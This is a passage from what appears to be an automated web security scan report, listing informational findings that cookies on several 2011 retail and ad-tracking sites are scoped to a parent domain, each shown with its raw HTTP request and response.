Date: Mon, 16 May 2011 10:50:15 GMT
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
PRAGMA: no-cache
Server: nginx/0.8.53
Set-Cookie: uID=Cqo6g03RAWdt2gOeC3Z5Ag==; expires=Tue, 15-May-12 10:50:15 GMT; domain=.mediaforge.com; path=/
Content-Length: 1443
Connection: keep-alive

<html lang="en-US"><head> <meta charset="UTF-8"> <title></title></head><body> <div id="mf_div"></div> <script type="text/javascript"> var _mf_tag = { "init": function() { var id = 'mf_div';
...[SNIP]...

12.73. http://tracking.searchmarketing.com/welcome.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp?SMCID=335&x= HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F15%2F2011+9%3A43%3A18+PM&SMCID=208

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F15%2F2011+9%3A53%3A40+PM&SMCID=335; expires=Tue, 14-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDQQCDBDDC=GGABBBEAJKJGPEAHHBLHBFPE; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

12.74. http://uat.netmng.com/pixel/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uat.netmng.com
Path:   /pixel/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/?aid=274&tax=womens HTTP/1.1
Host: uat.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7CE%2FGl4lyrJoU%2FfCqk%2F%2Fz3ABsa7pRKVoMGmzuppb39D6k9ABiWgZysNid%2Bm2o8FYwFGcHO8rdfalO3PrS42EDTvOm6aW%2B7sWIlfhsfYQwVaB7u3s3WL6nGzhvc6l7wsnH2nyC2CAdaKFSu5uJTq71eMnw%2BWhRLZVbdu7NvokiU%2Bfkr1%2BNBHoOIzZYbezn0URA%2FIKOZfIt8VMfXvc18H2H2lJXc7OPudGSP0yecnbfmPazNMiP4MWantE0L0xyfVnCJ89N2aKuAKZ0fcVakRCpfeWH4RcT5kxx5vzOcOFGRHTfpLyyiMi5TvmoX0KXseol8QUJb1bQhuYYU44kjCTBcgKL3%2BOQA0HTnmBaltcY0mVz3e0tAVsSL%2Byrj969mChLiovTlnOj%2B0oxM2rx6O8OsemhLzlhyMEJL9ZBULsDSXy9JjjsitTHCZmC4pZqWy3lOS8l%2Fe4iXC5qh3XX05R0mNHhGU8o4WMMQXvPcZQGVEn7MeVSv4JwEYPUtme7CF0%2Ba

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:21 GMT
Server: Apache/2.2.9
P3P: policyref="http://uat.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sat, 14 May 2011 01:54:21 GMT
Last-Modified: Sat, 14 May 2011 01:54:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=csmq4atf04cxa%7CJeuRJCb45V6uwY1xci0duejpNnUE%2BOmzqGMogMAW%2FNCOqkjFJeQTtSSwFM8SExogUBVq3aRXr6rOPcqNTmIC7EZV1nRS%2FfrPyazw99gyUAJXaI4v2Tf%2FYK%2FYCGNRiTDa8FIC%2F1rDdFnvxSKmwnP9%2FzSswr%2BFnZEedqWLNPmJOGiD%2BKTS14anDruAemPci57rfbGvxyPHPZwrhH9c2PC0R7Ymr8xiYKFUBnazCBzOBnL2qGd20SpExMUheTADl1d0TTjVbjvJQVia2%2BYow6VA05s7EZxex6vE%2BvmQgXxXWwR2mefK966%2FeFMgLbGnQsm5mGE5l%2BYsVCNKIKht%2BM7JXtn8nweceJeqZuNgJnNvN7mezkeiy1MIOhXMGKv%2BHUozybOtALE61aKDO%2BSoPj%2BhNGduTlw4jjewTANsUadm4eJQ75KAJA1KpHCSrfNDIRnHjMMAwYuzMxzJA7OiUPCwQbVx7hAHs0TdLiuv7ZzwK309%2BcMucPBVwOOwAyb9yajE; expires=Tue, 15-Nov-2011 01:54:21 GMT; path=/; domain=.netmng.com
Content-Length: 36
Connection: close
Content-Type: image/gif

GIF89a.............,...........D..;

12.75. http://www.bluefly.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluefly.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=1; SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSRT=6YPQTQA; SSOD=AGHw_gAA

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:31 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=e4XQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:31 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: TLTSID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
Set-Cookie: JSESSIONID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Path=/
Set-Cookie: _714bc2c9=guest; Expires=Tue, 15-May-2012 02:01:31 GMT; Path=/
Set-Cookie: CS_TRACKER_ID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Expires=Sat, 03-Jun-2079 05:15:38 GMT
RTSS: 1
Set-Cookie: TS18d374=e7c2bf9d5c17e0294f3546cf4c9ad3fb60874fe9f20602d14dd0857b; Path=/
Content-Length: 43592


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="ht
...[SNIP]...

12.76. http://www.bluefly.com/myfly/forgot_password.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluefly.com
Path:   /myfly/forgot_password.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myfly/forgot_password.jsp HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; mr_referredVisitor=0; SSLB=1; SSRT=24TQTQE; TLTHID=0BB9DB2A7F60107F22099FFA97D9051C; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; CoreAt=; cmRS=&t1=1305511135851&t2=1305511138934&t3=1305541454084&t4=1305511132981&lti=1305541454081&ln=&hr=/myfly/forgot_password.jsp&fti=&fn=keyword_search_0%3A0%3Bmyaccount_create%3A1%3B%3A2%3B&ac=&fd=&uer=&fu=&pi=myflyLogin&ho=core.bluefly.com/cm%3F&ci=90039438

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:35:18 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSID=AwA6gCkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAADm_dBNAAAAAAAAAAAAAAA; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 10:35:18 GMT
Set-Cookie: SSSC=1.G5607126572844751644.2.0.0; path=/; domain=.bluefly.com
Set-Cookie: SSRT=5v3QTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 10:35:18 GMT
Set-Cookie: SSOD=0; path=/; domain=.bluefly.com; expires=Thu, 01-Jan-1970 00:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=31B28F287FA8107F30ACA5F8317B6541; Path=/; Domain=.bluefly.com
RTSS: 1
Set-Cookie: TS18d374=e7ab75325d7e77e85138a8025c5c042cdc25568252c8426a4dd0fde6; Path=/
Content-Length: 38736


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w
...[SNIP]...

12.77. http://www.bluefly.com/myfly/login.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluefly.com
Path:   /myfly/login.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4 HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; cmTPSet=Y; mr_referredVisitor=0; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%5D; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; CoreAt=; cmRS=&t1=1305510900223&t2=1305510909795&t3=1305511130583&lti=1305511130581&ln=&hr=/myfly/login.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4&fti=&fn=keyword_search_0%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=core.bluefly.com/cm%3F&ci=90039438

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:07:01 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=xYbQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:07:01 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=2FF624847F61107F23939AFFB4D3A655; Path=/; Domain=.bluefly.com
RTSS: 1
Set-Cookie: TS18d374=abc710a5695fda7f92b304b93d86d0cedc25568252c8426a4dd086c5; Path=/
Content-Length: 67225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...

12.78. http://www.bluenile.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:04 GMT
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
X-Powered-By: ASP.NET
Set-Cookie: bnper=ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnper=CONTEXT-NAME~53&ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnper=CONTEXT-NAME~53&CURR~USD&ver~3; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnper=CONTEXT-NAME~53&CURR~USD&ver~3&CURR_SYM~%24; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: GUID=C1D03AAB_3A5C_4245_82B9_9C5170C3BA74; Domain=.bluenile.com; Expires=Thu, 22-Jan-2043 03:49:41 GMT; Path=/
Set-Cookie: bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:03:01 GMT; Path=/
Set-Cookie: bnses=ver~1; Domain=.bluenile.com; Path=/
Set-Cookie: bnses=new~true&ver~1; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZ93G; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:03:01 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 105239


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.or
...[SNIP]...

12.79. http://www.bluenile.com/build-your-own-diamond-ring

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /build-your-own-diamond-ring

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /build-your-own-diamond-ring?first_step=diamond&forceStep=DIAMONDS_STEP&track=more HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/engagement-rings?track=head
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.2.10.1305541144; testcookie=; stc=3NZR3Q

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 10:36:20 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: Wed, 31 Dec 1969 23:59:59 GMT
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: dsearch=ver~4&visibleBYOR~800000000&stateBYOR~RD-23-1567-------319.0-1558631.0-----------0------0%2C0%2C0-price-asc-USD--2%2C3%2C4%2C5%2C6-; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 10:36:16 GMT; Path=/
Set-Cookie: bld=ver~3&BYOR~DIAMONDS_STEP-DIAMONDS_STEP-0---; Domain=.bluenile.com; Expires=Wed, 15-May-2013 10:36:16 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 220209

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns
...[SNIP]...

12.80. http://www.bluenile.com/channel-recommendations.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /channel-recommendations.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /channel-recommendations.html?channelUrl=%2F&_=1305510935975 HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; bnses=new~true&ver~1; stc=3NZR3Q; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:04:16 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: bnses=new~false&ver~1; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:04:13 GMT; Path=/
Set-Cookie: bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; Domain=.bluenile.com; Expires=Thu, 13-May-2021 02:04:13 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0


12.81. http://www.bluenile.com/fbc/setStatus.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluenile.com
Path:   /fbc/setStatus.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fbc/setStatus.html?_=1305510944826 HTTP/1.1
Host: www.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; bnses=new~false&ver~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:38 GMT
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
X-Powered-By: ASP.NET
Set-Cookie: bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; Domain=.bluenile.com; Path=/
Vary: Accept-Encoding
Content-Length: 0


12.82. http://www.footlocker.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLC=web%2D23; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kvNzcq7EhhaxwicsoNK5tEHcjE3%0AYFDrCAOfSiDaoXvuilQ%2FxCMBrPOPNx8buPyL9lx0NzqsjNz0q4kL6gSipJbM8SiVTyaUlrgEsJFe%0AR0Pt4%2BMEOSoTJQWYIpa4nKSm4viwlCWT1JV2V7KDGygnmWiNg1zAOCJfoc2GfIzeW5%2FeSK5uXUOS%0AKuE8UK42iD0wQl31wi0YADO2S9yjp8izb9ei; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; NST=2011%2D05%2D15%2020%3A43%3A37; TID=5555%2D37151120432137200525561%2D0; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; cmTPSet=Y; CHOSEN_BANNER_ID=FS/$75; fcspersistslider_click_1=1; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; mbcs=FF749AA3-A7E6-5BAF-08D2-2754D53C08DB

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:56 GMT
Connection: close
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kvNzcq7EhhaxwicsoNK5tEHcjE3%0AYFDrCAOfSiDaoXvuilQ%2FxCMBrPOPNx8buPyL9lx0NzqsjNz0q4kL6gSipJbM8SiVTyaUlrgEsJFe%0AR0Pt4%2BMEOSoTJQWYIpa4nKSm4viwlCWT1JV2V7KDGygnmWiNg1zAOCJfoc2GfIzeW5%2FeSK5uXUOS%0AKuE8UK42iD0wQl31wi0YADO2S9yjp8izb9ei;expires=Wed, 08-May-2041 01:58:56 GMT;path=/
